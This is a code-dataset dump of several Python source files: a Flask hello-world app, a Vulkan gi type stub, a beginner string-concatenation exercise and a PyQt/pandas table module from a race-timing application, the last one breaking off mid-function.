blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a75a6a9fff392c36a2f7ea0a26ceb9742e30b997 | 1a2bf34d7fc1d227ceebf05edf00287de74259c5 | /flask/Day02/fisher.py | 1cc4adb358cfd1bff444552db2490d00e0e84b5b | []
| no_license | lzn9423362/Django- | de69fee75160236e397b3bbc165281eadbe898f0 | 8c1656d20dcc4dfc29fb942b2db54ec07077e3ae | refs/heads/master | 2020-03-29T18:03:47.323734 | 2018-11-28T12:07:12 | 2018-11-28T12:07:12 | 150,192,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | # 从flask框架中导入Flask这个类
from flask import Flask
#初始化一个flask对象
#需要传递一个参数__name__
# 1.方便flask框架去寻找资源
# 2.方便flask插件比如flask-Sqlalchemy出现错误的时候,好去寻找问题所在的位置
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'hello world'
#如果当前这个文件是作为入口程序运行,那么就执行app.run()
if __name__ == '__main__':
#启动一个应用服务器,来接受用户的请求
app.run(host='0.0.0.0') | [
"[email protected]"
]
| |
a813c48c1eaee83257117b19fbeecd6ea97aaf61 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Vulkan/DescriptorSetLayoutBinding.py | 0479636cd1074bcea3d9e51d4a14b5da89e17818 | []
| no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,259 | py | # encoding: utf-8
# module gi.repository.Vulkan
# from /usr/lib64/girepository-1.0/Vulkan-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
class DescriptorSetLayoutBinding(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(DescriptorSetLayoutBinding), '__module__': 'gi.repository.Vulkan', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'DescriptorSetLayoutBinding' objects>, '__weakref__': <attribute '__weakref__' of 'DescriptorSetLayoutBinding' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(DescriptorSetLayoutBinding)
| [
"[email protected]"
]
| |
dc8ac8f98abdd3d2476ff6576232b08b43103914 | b6fc54cff7037f5e4ef26cb4a645d5ea5a6fecdf | /000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p03st06TASK06_20210205_datatypes.py | 117d126123441b6fb42d7d39b655d4b2bc394545 | [
"Apache-2.0"
]
| permissive | SafonovMikhail/python_000577 | 5483eaf2f7c73bc619ce1f5de67d8d689d2e7dd4 | f2dccac82a37df430c4eb7425b5d084d83520409 | refs/heads/master | 2022-12-08T10:53:57.202746 | 2022-12-07T09:09:51 | 2022-12-07T09:09:51 | 204,713,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | '''
Напишите программу, которая считывает две строки и выводит на экран конкатенацию этих строк
Примечание: конкатенация - операция "сложения" двух строк
Sample Input 1:
Язык программирования
Python
Sample Output 1:
Язык программированияPython
Sample Input 2:
37
81
Sample Output 2:
3781
'''
s1, s2 = input(), input()
print(s1 + s2)
| [
"[email protected]"
]
| |
058a05a4499c06f74891be9ead56d0e1c7689246 | 5810e290cd89e6e6d04cb19fb7af063c8a868b4c | /Aplikace_1_0/Source/ewitis/gui/dfTableTimes.py | e6d00fbe89517001b771345c60e5e2aa72553e40 | []
| no_license | amoydream/ew_aplikace | 0a0e1af79aa74378e4040cb563c4d573f8af9ebf | f7868d4924dc2cae6ab79efda4662aee7465bdbf | refs/heads/master | 2023-06-14T06:25:40.122872 | 2021-07-12T21:07:56 | 2021-07-12T21:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,291 | py | # -*- coding: utf-8 -*-
'''
Created on 30.07.2015
@author: Meloun
'''
import time, os
import pandas as pd
from PyQt4 import QtCore, QtGui
from libs.myqt.DataframeTableModel import DataframeTableModel
from libs.utils.ListOfDicts import ListOfDicts
import libs.utils.utils as utils
import libs.timeutils.timeutils as timeutils
from ewitis.data.DEF_ENUM_STRINGS import COLORS, STATUS
import ewitis.gui.TimesUtils as TimesUtils
import libs.pandas.df_utils as df_utils
from ewitis.data.DEF_DATA import *
from ewitis.gui.dfTableUsers import tableUsers
from ewitis.gui.dfTableCategories import tableCategories
from ewitis.gui.dfTableCGroups import tableCGroups
import ewitis.gui.dfTableTimesExport as ttExport
import ewitis.gui.dfTableTimesAutonumbers as ttAutonumbers
import ewitis.gui.dfTableTimesAutocell as ttAutocell
from ewitis.data.db import db
from ewitis.gui.dfTable import DfTable
from ewitis.data.dstore import dstore
from ewitis.gui.Ui import Ui
from ewitis.gui.multiprocessingManager import mgr, eventCalcNow, eventCalcReady
from ewitis.gui.UiAccesories import uiAccesories, MSGTYPE
from ewitis.gui.tabExportSettings import tabExportSettings
import ewitis.exports.ewitis_html as ew_html
CONF_TABLE_TIMES = [
{'name': 'id', 'length':0, 'default': True, "editable": False },
{'name': 'nr', 'length':0, 'default': True, "editable": True },
{'name': 'cell', 'length':0, 'default': True, "editable": True },
{'name': 'status', 'length':0, 'default': True, "editable": True },
{'name': 'time1', 'length':0, 'default': True, "editable": False },
{'name': 'lap1', 'length':0, 'default': True, "editable": False },
{'name': 'time2', 'length':0, 'default': True, "editable": False },
{'name': 'lap2', 'length':0, 'default': True, "editable": False },
{'name': 'time3', 'length':0, 'default': True, "editable": False },
{'name': 'lap3', 'length':0, 'default': True, "editable": False },
{'name': 'time4', 'length':0, 'default': True, "editable": False },
{'name': 'lap4', 'length':0, 'default': True, "editable": False },
{'name': 'name', 'length':0, 'default': True, "editable": False },
{'name': 'category', 'length':0, 'default': True, "editable": False },
{'name': 'order1', 'length':0, 'default': True, "editable": False },
{'name': 'order2', 'length':0, 'default': True, "editable": False },
{'name': 'order3', 'length':0, 'default': True, "editable": False },
{'name': 'start', 'length':0, 'default': True, "editable": False },
{'name': 'points1', 'length':0, 'default': True, "editable": False },
{'name': 'points2', 'length':0, 'default': True, "editable": False },
{'name': 'points3', 'length':0, 'default': True, "editable": False },
{'name': 'points4', 'length':0, 'default': True, "editable": False },
{'name': 'points5', 'length':0, 'default': True, "editable": False },
{'name': 'un1', 'length':0, 'default': True, "editable": True },
{'name': 'un2', 'length':0, 'default': True, "editable": True },
{'name': 'un3', 'length':0, 'default': True, "editable": True },
{'name': 'us1', 'length':0, 'default': True, "editable": True },
{'name': 'timeraw', 'length':0, 'default': True, "editable": True },
]
'''
Model
'''
class DfModelTimes(DataframeTableModel):
def __init__(self, table):
super(DfModelTimes, self).__init__(table)
self.df = pd.DataFrame()
self.conf = ListOfDicts(CONF_TABLE_TIMES)
self.db_con = db.getDb()
self.changed_rows = pd.DataFrame()
self.mynr = 0
def flags(self, index):
column_name = self.df.columns[index.column()]
editable_columns = self.conf.Get("name", ("editable", True))
if(column_name in editable_columns):
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEditable
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def data(self, index, role=QtCore.Qt.DisplayRole):
if (role == QtCore.Qt.BackgroundRole):
if dstore.Get("times")["highlight_enable"]:
try:
row = self.df.iloc[index.row()]
#no number and no user string
if row['nr']== 0 and row['us1'] == '':
return QtGui.QColor(COLORS.peachorange)
#changed rawtime -> yellow
elif row['state'][0]== 'C':
return QtGui.QColor(COLORS.yellow)
#time on request -> lila
elif row['state'][1] == 'R':
return QtGui.QColor(COLORS.lila)
#manual time -> green
elif row['state'][2]== 'M':
return QtGui.QColor(COLORS.light_green)
except:
pass
return
return DataframeTableModel.data(self, index, role)
def IsColumnAutoEditable(self, column):
'''pokud true, po uživatelské editaci focus na další řádek'''
#number and cell
if(column == 1) or (column == 2):
return True
return False
def getDefaultRow(self):
row = DataframeTableModel.getDefaultRow(self)
row["cell"] = 250
return row
def sModelChanged(self, index1, index2):
DataframeTableModel.sModelChanged(self, index1, index2)
def GetDataframe(self):
df = mgr.GetDfs()["table"]
if eventCalcReady.is_set() == False:
for index, row in self.changed_rows.iterrows():
if index in df.index:
df.loc[index] = row
else:
self.changed_rows = pd.DataFrame()
#ToDo: remove
#mynr = len(df.index)
#print "mynr:", mynr
#if(mynr > self.mynr):
# print "TT: new record", time.clock()
#self.mynr = mynr
return df
def setDataFromDict(self, mydict):
print "setDataFromDict()", mydict, self.name
#dict => df
dfChange = pd.DataFrame([mydict])
dfChange.set_index(dfChange.id, inplace=True)
#take row before change (from global df)
dfChangedRow = self.df.loc[dfChange.id]
#take user before change
old_user = tableUsers.model.getUserParNr(int(dfChangedRow['nr']))
#update row before change with change
dfChangedRow.update(dfChange)
#category changed
if "nr" in mydict:
user_id = self.checkChangedNumber(dfChangedRow.iloc[0])
if user_id == None: #dialog inside checkChangedNumber()
return False
#adjust dict for writing to db
mydict["user_id"] = user_id
if mydict["nr"] < 0:
mydict["us1"] = "Civil #"+str(abs(mydict["nr"]))
del mydict["nr"]
elif "cell" in mydict:
pass
# TIMERAW column
elif "timeraw" in mydict:
try:
dbTimeraw = TimesUtils.TimesUtils.timestring2time(mydict['timeraw'])
except TimesUtils.TimeFormat_Error:
uiAccesories.showMessage(self.name+" Update error", "Wrong Time format!")
return False
#adjust dict for writing to db
mydict["time_raw"] = dbTimeraw
del mydict["timeraw"]
#change the state (C -> manually Changed)
state = str(dfChangedRow.iloc[0]['state'])
mydict["state"] = "C" + state[1:]
elif "un1" in mydict:
pass
elif "un2" in mydict:
pass
elif "un3" in mydict:
pass
elif "us1" in mydict:
pass
else:
uiAccesories.showMessage(self.name+" Update error", "Unexpecting change!")
return False
# add changed row to "changed_rows"
# keep as dataframe otherwise float issues for "nr" and "cell"
cleared = self.ClearCalculated(dfChangedRow.iloc[0].copy())
self.changed_rows = self.changed_rows.append(cleared)
try:
self.changed_rows["nr"] = int(self.changed_rows["nr"])
self.changed_rows["cell"] = int(self.changed_rows["cell"])
except:
pass
eventCalcReady.clear() #s
#update db from mydict
db.update_from_dict(self.name, mydict)
#user changed => reset all times for new user
if mydict and ("user_id" in mydict):
#print "mazu vsechny1", mydict["user_id"]
self.ResetCalculatedValuesForUser(mydict["user_id"])
#reset 1 time
elif mydict and ("id" in mydict):
#print "mazu neco", mydict["id"]
self.ResetCalculatedValues(mydict["id"])
if old_user and ("id" in old_user):
print "mazu vsechny2", old_user["id"]
self.ResetCalculatedValuesForUser(old_user["id"])
#self.ResetNrOfLaps()
eventCalcNow.set()
return True
def ClearCalculated(self, tabRow):
for i in range(0, NUMBER_OF.TIMESCOLUMNS):
tabRow["time"+str(i+1)] = None
tabRow["lap"+str(i+1)] = None
for i in range(0, NUMBER_OF.THREECOLUMNS):
tabRow["order"+str(i+1)] = None
for i in range(0, NUMBER_OF.POINTSCOLUMNS):
tabRow["points"+str(i+1)] = None
tabRow["status"] = "wait"
#precalculate name and category
user = tableUsers.model.getUserParNr(tabRow["nr"])
if user:
if(user['name']):
tabRow['name'] = user['name'].upper()
user['name'] = user['name'] +' '+user['first_name']
tabRow['category'] = user['category']
return tabRow
def checkChangedNumber(self, tabRow):
'''ZMĚNA ČÍSLA'''
'''- kontrola uživatele, categorie, tagu
- vrací user_id!!
'''
#print "checkChangedNumber", tabRow
if(tabRow["nr"] == 0):
user_id = 0
else:
#rigthts to change start cell?
if(tabRow['cell'] == 1) and (dstore.GetItem("racesettings-app" ,["evaluation", "starttime"]) == StarttimeEvaluation.VIA_CATEGORY):
uiAccesories.showMessage(self.name+" Update error", "Cannot assign user to start time!")
return None
#user exist?
user = tableUsers.model.getUserParNr(int(tabRow['nr']))
if user == None:
uiAccesories.showMessage(self.name+" Update error", "User nr. "+ str(tabRow['nr'])+" not found !")
QtCore.QTimer.singleShot(100, lambda: self.table.Edit())
return None
#category exist?
category = tableCategories.model.getCategoryParName(user['category'])
if category.empty:
uiAccesories.showMessage(self.name+" Update error", "Category not found " + str(user['category']))
return None
#user id exist?
user_id = tableUsers.model.getIdOrTagIdParNr(user['nr'])
if user_id == None:
uiAccesories.showMessage(self.name+": Update error", "No user or tag with number "+str(tabRow['nr'])+"!")
return None
return user_id
def ResetCalculatedValues(self, timeid):
query = \
" UPDATE times" +\
" SET time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null" +\
" WHERE (times.id = \""+str(timeid)+"\")"
res = db.query(query)
db.commit()
return res
def ResetCalculatedValuesForUser(self, user_id):
query = \
" UPDATE times" +\
" SET time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null" +\
" WHERE (times.user_id = \""+str(user_id)+"\")"
res = db.query(query)
db.commit()
return res
def ResetNrOfLaps(self):
query = \
" UPDATE times" +\
" SET lap1 = Null, lap2 = Null, lap3 = Null, lap4 = Null"
res = db.query(query)
db.commit()
return res
'''
Proxy Model
'''
class DfProxymodelTimes(QtGui.QSortFilterProxyModel):
def __init__(self, parent = None):
QtGui.QSortFilterProxyModel.__init__(self, parent)
self.myclass = None
#This property holds whether the proxy model is dynamically sorted and filtered whenever the contents of the source model change.
self.setDynamicSortFilter(True)
#This property holds the column where the key used to filter the contents of the source model is read from.
#The default value is 0. If the value is -1, the keys will be read from all columns.
self.setFilterKeyColumn(-1)
'''
Table
'''
class DfTableTimes(DfTable):
def __init__(self):
self.init = False
DfTable.__init__(self, "Times")
def InitGui(self):
DfTable.InitGui(self)
self.gui['civils_to_zeroes'] = Ui().TimesCivilsToZeroes
self.gui['recalculate'] = Ui().TimesRecalculate
self.gui['aWwwExportDirect'] = Ui().aWwwExportDirect
self.gui['aWwwExportLogo'] = Ui().aWwwExportLogo
self.gui['aExportResults'] = Ui().aExportResults
self.gui['aExportResultsDNF'] = Ui().aExportResultsDNF
self.gui['aExportDbResults'] = Ui().aExportDbResults
self.gui['aExportDbResultsDNF'] = Ui().aExportDbResultsDNF
self.gui['aExportAllTimes'] = Ui().aExportAllTimes
self.gui['aExportLaptimes'] = Ui().aExportLaptimes
try:
self.gui['times_db_export'] = Ui().TimesDbExport
self.gui['times_db_import'] = Ui().TimesDbImport
except AttributeError:
pass
self.gui['filter_column'] = Ui().TimesFilterColumn
self.gui['filter_starts'] = Ui().TimesFilterStarts
self.gui['filter_finishes'] = Ui().TimesFilterFinishes
self.gui['auto_refresh'] = Ui().TimesAutoRefresh
ttAutonumbers.InitGui()
ttAutocell.InitGui()
self.gui['auto_refresh_clear'] = Ui().TimesAutoRefreshClear
self.gui['auto_www_refresh'] = Ui().TimesAutoWWWRefresh
self.gui['auto_www_refresh_clear'] = Ui().TimesAutoWWWRefreshClear
self.gui['highlight_enable'] = Ui().TimesHighlightEnable
self.gui['auto_timer_set'] = Ui().TimerSet
self.gui['auto_timer_get'] = Ui().TimerGet
self.gui['auto_timer_icon'] = Ui().TimerIcon
self.auto_timer_cnt = 0
self.auto_timer_green_cnt = 5
self.timericon_grey = QtGui.QIcon("gui/icons/Circle_Grey_34212.png")
self.timericon_green = QtGui.QIcon("gui/icons/Circle_Green_34211.png")
self.timericon_yellow = QtGui.QIcon("gui/icons/Circle_Yellow_34215.png")
self.timericon_orange = QtGui.QIcon("gui/icons/Circle_Orange_34213.png")
self.timericon_red = QtGui.QIcon("gui/icons/Circle_Red_34214.png")
def Init(self):
DfTable.Init(self)
#set sort rules
self.gui['view'].sortByColumn(28, QtCore.Qt.DescendingOrder)
self.UpdateGui()
self.dfActiveNrs = pd.DataFrame()
self.init = True
def sDeletePreCallback(self, id):
dfRow = self.model.df.loc[id] #take row (from global df)
user = tableUsers.model.getUserParNr(int(dfRow['nr'])) #take user
#reset values for all times of this user
if user != None:
self.model.ResetCalculatedValuesForUser(user["id"])
return True
def createSlots(self):
#standart slots
DfTable.createSlots(self)
#filter starts/finishes
QtCore.QObject.connect(self.gui['filter_starts'], QtCore.SIGNAL("clicked()"), self.sFilterStarts)
QtCore.QObject.connect(self.gui['filter_finishes'], QtCore.SIGNAL("clicked()"), self.sFilterFinishes)
#autonumbers
ttAutonumbers.createSlots()
#autocell
ttAutocell.createSlots()
#
QtCore.QObject.connect(self.gui['auto_refresh'], QtCore.SIGNAL("valueChanged(int)"), lambda state: (uiAccesories.sGuiSetItem("times", ["auto_refresh"], state, self.UpdateGui), setattr(self, "auto_refresh_cnt", state)))
QtCore.QObject.connect(self.gui['auto_www_refresh'], QtCore.SIGNAL("valueChanged(int)"), lambda state: (uiAccesories.sGuiSetItem("times", ["auto_www_refresh"], state, self.UpdateGui), setattr(self, "auto_www_refresh_cnt", state)))
QtCore.QObject.connect(self.gui['auto_refresh_clear'], QtCore.SIGNAL("clicked()"), lambda: uiAccesories.sGuiSetItem("times", ["auto_refresh"], 0, self.UpdateGui))
QtCore.QObject.connect(self.gui['auto_www_refresh_clear'], QtCore.SIGNAL("clicked()"), lambda: uiAccesories.sGuiSetItem("times", ["auto_www_refresh"], 0, self.UpdateGui))
QtCore.QObject.connect(self.gui['highlight_enable'], QtCore.SIGNAL("stateChanged(int)"), lambda state: uiAccesories.sGuiSetItem("times", ["highlight_enable"], state, self.UpdateGui))
QtCore.QObject.connect(self.gui['auto_timer_set'], QtCore.SIGNAL("valueChanged(int)"), lambda state: (uiAccesories.sGuiSetItem("times", ["auto_timer"], state, self.UpdateGui), setattr(self, "auto_timer_cnt", state)))
#button Recalculate
QtCore.QObject.connect(self.gui['civils_to_zeroes'], QtCore.SIGNAL("clicked()"), lambda:self.sCivilsToZeroes())
QtCore.QObject.connect(self.gui['recalculate'], QtCore.SIGNAL("clicked()"), lambda:self.sRecalculate())
#exports
QtCore.QObject.connect(self.gui['aWwwExportDirect'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eHTM_EXPORT))
QtCore.QObject.connect(self.gui['aWwwExportLogo'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eHTM_EXPORT_LOGO))
QtCore.QObject.connect(self.gui['aExportResults'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT))
QtCore.QObject.connect(self.gui['aExportResultsDNF'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT_DNS))
QtCore.QObject.connect(self.gui['aExportDbResults'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT_DB))
QtCore.QObject.connect(self.gui['aExportDbResultsDNF'], QtCore.SIGNAL("triggered()"), lambda: self.sExportDirect(ttExport.eCSV_EXPORT_DNS_DB))
def sSlot(self, state = False):
print "sSlot", state
def EditingFinished(self, x):
print "self.EditingFinished", x
def sCivilsToZeroes(self):
if (uiAccesories.showMessage("Civils to zeroes", "Are you sure you want to set civils numbers to zeroes?", MSGTYPE.warning_dialog) != True):
return
print "A: Times: Civils to zeroes.. "
query = \
" UPDATE times" +\
" SET user_id=0, time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null" +\
" WHERE (times.user_id > 100000)"
res = db.query(query)
db.commit()
eventCalcNow.set()
print "A: Times: Civils to zeroes.. press F5 to finish"
return res
def sRecalculate(self):
if (uiAccesories.showMessage("Recalculate", "Are you sure you want to recalculate times and laptimes?", MSGTYPE.warning_dialog) != True):
return
query = \
" UPDATE times" +\
" SET time1 = Null, lap1 = Null, time2 = Null, lap2 = Null, time3 = Null, lap3 = Null, time4 = Null, lap4 = Null"
res = db.query(query)
#self.ResetStatus()
db.commit()
eventCalcNow.set()
print "A: Times: Recalculating.. press F5 to finish"
return res
def sFilterStarts(self):
self.gui['filter_column'].setValue(2)
self.gui['filter'].setText("1")
def sFilterFinishes(self):
self.gui['filter_column'].setValue(2)
self.gui['filter'].setText("250")
'''
F11, F12 - final results
- prepare DFs for export (according to filter, sort, etc.)
- call ExportToXXXFiles with these 3 DFs
'''
def sExportDirect(self, export_type = ttExport.eCSV_EXPORT):
#ret = uiAccesories.showMessage("Results Export", "Choose format of results", MSGTYPE.question_dialog, "NOT finally results", "Finally results")
#if ret == False: #cancel button
# return
# 3DFs for 3 exports
exportDf = [pd.DataFrame()] * NUMBER_OF.EXPORTS
exported = {}
ttDf = self.model.GetDataframe() #self.model.df
utDf = pd.DataFrame()
#merge table users and times
if len(ttDf) != 0:
cols_to_use = tableUsers.model.df.columns.difference(self.model.df.columns)
cols_to_use = list(cols_to_use) + ["nr"]
utDf = pd.merge(ttDf, tableUsers.model.df[cols_to_use], how = "left", on="nr")
#call export function
if (len(ttDf) != 0) or (export_type == ttExport.eHTM_EXPORT_LOGO):
try:
exported = ttExport.Export(utDf, export_type)
except IOError:
uiAccesories.showMessage("Export", time.strftime("%H:%M:%S", time.localtime())+" :: NOT succesfully, cannot write into the file.", MSGTYPE.statusbar)
return
#dialog message
exported_string = ""
for key in sorted(exported.keys()):
exported_string += key + " : " + str(exported[key])+" times\n"
if export_type == ttExport.eHTM_EXPORT or export_type == ttExport.eHTM_EXPORT_LOGO:
uiAccesories.showMessage("WWW Export", time.strftime("%H:%M:%S", time.localtime())+" :: exported "+exported_string, MSGTYPE.statusbar)
else:
uiAccesories.showMessage("Table Times Exported", exported_string, MSGTYPE.info)
return
'''
end of SLOTS
'''
def AutoUpdate(self):
ztime = time.clock()
autorefresh = dstore.GetItem("times", ["auto_refresh"])
if(autorefresh == 0):
pass
elif(self.auto_refresh_cnt == 0):
self.auto_refresh_cnt = autorefresh
elif((self.auto_refresh_cnt-1) != 0):
self.auto_refresh_cnt = self.auto_refresh_cnt - 1
else:
#print "auto update", self.auto_refresh_cnt, autorefresh, "s"
self.auto_refresh_cnt = autorefresh
ret = self.Update()
if(ret == True):
localtime = time.strftime("%H:%M:%S", time.localtime())
updatetime = str(time.clock() - ztime)[0:5]+"s"
calctime = str(mgr.GetInfo()["lastcalctime"])[0:5]+"s"
uiAccesories.showMessage("Auto Refresh", localtime + " :: update: "+updatetime +" / calc: "+ str(calctime), MSGTYPE.statusbar)
#uiAccesories.showMessage("Auto Refresh", time.strftime("%H:%M:%S", time.localtime())+" ("+str(time.clock() - ztime)[0:5]+"s)", MSGTYPE.statusbar) ztime = time.clock()
else:
print "AutoUpdate: KO"
autorefresh = dstore.GetItem("times", ["auto_www_refresh"])
if(autorefresh == 0):
pass
elif(self.auto_www_refresh_cnt == 0):
self.auto_www_refresh_cnt = autorefresh
elif((self.auto_www_refresh_cnt-1) != 0):
self.auto_www_refresh_cnt = self.auto_www_refresh_cnt - 1
else:
#print "auto update", self.auto_refresh_cnt, autorefresh, "s"
self.auto_www_refresh_cnt = autorefresh
ret = self.sExportDirect(ttExport.eHTM_EXPORT)
#decrement the timer
if(self.auto_timer_cnt > 0):
self.auto_timer_cnt = self.auto_timer_cnt - 1
self.auto_timer_green_cnt = 5
#update the get value
self.gui['auto_timer_get'].setText(str(self.auto_timer_cnt)+" s")
#update the icon
autorefresh_set = dstore.GetItem("times", ["auto_timer"])
if(autorefresh_set == 0):
self.gui['auto_timer_icon'].setIcon(self.timericon_grey)
elif(self.auto_timer_cnt == 0):
#after 5s the green is blinking
if self.auto_timer_green_cnt == 0:
self.gui['auto_timer_icon'].setIcon(self.timericon_grey)
self.auto_timer_green_cnt = 1
else:
self.gui['auto_timer_icon'].setIcon(self.timericon_green)
self.auto_timer_green_cnt = self.auto_timer_green_cnt - 1
elif(self.auto_timer_cnt <= 5):
self.gui['auto_timer_icon'].setIcon(self.timericon_yellow)
elif((self.auto_timer_cnt-1) != 0):
self.gui['auto_timer_icon'].setIcon(self.timericon_red)
else:
self.auto_timer_cnt = autorefresh_set
#called periodically, timer 1,5s
def Update_AutoNumbers(self, new_time):
ret = False
#auto timer
if new_time["cell"] == 1:
self.auto_timer_cnt = dstore.GetItem("times", ["auto_timer"])
#auto numbers
ds_times = dstore.Get("times")
if(ds_times["auto_number_enable"] and ds_times["auto_number_logic"]):
updates = ttAutonumbers.Update(self.model.GetDataframe(), new_time)
#print "00: Update_AutoNumbers: ", updates, time.clock()
#self.model.Update()
for update in updates:
user = tableUsers.model.getUserParNr(int(update['nr']))
if user != None:
#update user id in db
if user["nr"] < 0:
#for civils also write name to user string
db.update_from_dict(self.model.name, {"id":update["id"], "user_id":user["id"], "us1":user["name"]})
else:
db.update_from_dict(self.model.name, {"id":update["id"], "user_id":user["id"]})
print "I: auto number: update:", update['nr'], "id:", update["id"]
ret = True #only one number at once
if ret == True:
eventCalcNow.set()
return ret
def Get_ActiveNumbers(self):
ret_list = []
if 'nr' in self.dfActiveNrs:
return self.dfActiveNrs["nr"].tolist()
return ret_list
def Update_ActiveNumbers(self):
ttDf = self.model.GetDataframe()
if 'nr' in ttDf.columns:
ttDf = ttDf.groupby("nr", as_index = False).last()
self.dfActiveNrs = ttDf[(ttDf.cell!=250) & (ttDf.status.str.match('race'))]
def UpdateGui(self):
DfTable.UpdateGui(self)
times = dstore.Get("times")
self.gui['highlight_enable'].setCheckState(times["highlight_enable"])
#autonumbers
ttAutonumbers.UpdateGui()
#autocell
ttAutocell.UpdateGui()
self.gui['auto_refresh'].setValue(times["auto_refresh"])
self.gui['auto_www_refresh'].setValue(times["auto_www_refresh"])
#stylesheets
if(times["auto_refresh"] == 0):
self.gui['auto_refresh'].setStyleSheet("")
else:
self.gui['auto_refresh'].setStyleSheet("background:"+COLORS.green)
return
def Update(self):
# stop dynamic filtering if no children
# because of filter issue and "has stopped working" error
#self.proxy_model.setDynamicSortFilter(self.proxy_model.hasChildren())
#print "U1"
ret = DfTable.Update(self)
#print "U2"
#update gui
self.UpdateGui()
#update active numbers
self.Update_ActiveNumbers()
# # po F5 edituje číslo u prvniho radku
# myindex = self.proxy_model.index(0,1)
# print myindex, type(myindex), myindex.column(), myindex.row()
# if(myindex.isValid() == True):
# self.gui['view'].edit(myindex)
return ret
#edit previous cell
def AutoEdit_MOVEDTO_dfTABLE(self, myindex):
myindex = self.proxy_model.mapFromSource(myindex)
if myindex.row() > 0:
